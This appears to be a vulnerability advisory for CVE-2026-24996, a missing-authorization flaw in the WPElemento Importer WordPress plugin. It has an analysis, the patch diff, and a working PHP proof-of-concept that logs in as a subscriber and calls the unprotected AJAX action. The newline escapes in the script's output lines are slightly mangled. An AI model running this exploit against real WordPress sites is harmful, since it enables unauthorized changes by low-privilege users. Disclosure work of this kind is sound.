Atomic Edge analysis of CVE-2026-24996:
The WPElemento Importer plugin for WordPress versions up to and including 0.6.4 contains a missing authorization vulnerability. The flaw resides in an AJAX-accessible function, allowing authenticated attackers with Subscriber-level permissions or higher to perform unauthorized actions. The CVSS score of 4.3 reflects a medium-severity impact.
Atomic Edge research identifies the root cause as a missing capability check and nonce verification in the `wpelemento_importer_setup_elementor` function. The vulnerable function is located in the file `wpelemento-importer/theme-wizard/elemento_exporter_whizzie.php`. Prior to the patch, the function at line 1336 began execution without validating the user’s permissions or the request’s authenticity.
Exploitation occurs via a POST request to the WordPress admin AJAX endpoint, `/wp-admin/admin-ajax.php`. An attacker with a valid subscriber-level WordPress session crafts a request with the `action` parameter set to `wpelemento_importer_setup_elementor`. No nonce parameter is required in the vulnerable version. The attacker sends this request to trigger the function’s unauthorized logic.
The patch, implemented in version 0.6.5, adds two critical security checks at the start of the `wpelemento_importer_setup_elementor` function. First, it verifies the AJAX nonce using `check_ajax_referer(‘whizzie_nonce’, ‘wpnonce’, false)`. Second, it confirms the user has administrative privileges with `current_user_can(‘manage_options’)`. If either check fails, the function terminates with a JSON error response, preventing unauthorized execution.
Successful exploitation allows an attacker with minimal privileges to perform the action intended only for administrators. While the exact impact of the `wpelemento_importer_setup_elementor` function is not detailed in the diff, such unauthorized access in an importer plugin could lead to unintended theme or demo data changes, site configuration modification, or data exposure depending on the function’s internal logic.
--- a/wpelemento-importer/plugin.php
+++ b/wpelemento-importer/plugin.php
@@ -3,7 +3,7 @@
Plugin Name: WPElemento Importer
Plugin URI:
Description: Effortlessly set up WordPress themes with WPelemento Importer. One-click demo imports, Elementor compatibility, and support for diverse themes.
- Version: 0.6.4
+ Version: 0.6.5
Requires at least: 5.2
Requires PHP: 7.2
Author: wpelemento
--- a/wpelemento-importer/theme-wizard/elemento_exporter_whizzie.php
+++ b/wpelemento-importer/theme-wizard/elemento_exporter_whizzie.php
@@ -1336,6 +1336,14 @@
}
// this code is for demo elementor importer start //
function wpelemento_importer_setup_elementor() {
+
+ if (!check_ajax_referer('whizzie_nonce', 'wpnonce', false)) {
+ wp_send_json_error(array('message' => esc_html__('Nonce verification failed', 'wpelemento-importer')));
+ }
+
+ if (!current_user_can('manage_options')) {
+ wp_send_json_error(array('message' => esc_html__('Insufficient permissions. Administrator access required.', 'wpelemento-importer')));
+ }
$elemento_themes = $this->get_elemento_themes();
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24996 - WPElemento Importer <= 0.6.4 - Missing Authorization
<?php
// Configuration
$target_url = 'https://vulnerable-site.com'; // Set target WordPress site URL
$username = 'subscriber'; // Attacker's subscriber username
$password = 'password'; // Attacker's subscriber password
// Initialize cURL session for WordPress login to obtain authentication cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
// Check if login likely succeeded by attempting to access the AJAX endpoint with the vulnerable action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'action' => 'wpelemento_importer_setup_elementor'
// No 'wpnonce' parameter required for exploitation in versions <= 0.6.4
)));
$ajax_response = curl_exec($ch);
curl_close($ch);
// Output the server's response
echo "Target: $target_urln";
echo "Action: wpelemento_importer_setup_elementorn";
echo "Response:n";
print_r($ajax_response);
?>
